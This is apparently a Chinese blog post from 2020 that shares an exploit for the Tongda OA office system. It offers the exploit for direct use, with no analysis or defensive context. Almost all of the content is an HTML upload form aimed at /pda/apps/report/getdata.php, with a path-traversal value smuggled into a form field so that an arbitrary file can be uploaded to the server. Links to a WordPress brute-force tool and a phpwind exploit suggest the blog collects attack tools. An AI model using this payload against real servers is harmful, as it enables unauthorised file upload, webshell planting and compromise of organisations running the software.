通达OA最新漏洞利用EXP分享

作者：小俊分类： WEB漏洞大全发布于：2020-2-28 23:02 ė596次浏览 60条评论

直接上exp。

EXP：

<html> <head> </head> <body> <table width="80%" border="0" align="center"> <form name="form1" method="post" action="http://127.0.0.1//pda/apps/report/getdata.php" enctype="multipart/form-data"> <tr> <td align="center"><input name="ATTACHMENT" type="file" id="upfile"></td> <td align="center"><input name="type" type="text" value="addfile"></td> <td align="center"><input name="other" type="text" value="}/../../../../{22"></td> </tr> <tr> <td align="center"><input type="submit" name="Submit" value="上传图片"></td> </tr> </form> </table> </body>

本文出自小俊博客，转载时请注明出处及相应链接。

0

« wordperss批量爆破工具

phpwind权限泄露漏洞和exp»

发表评论取消回复

Ɣ回顶部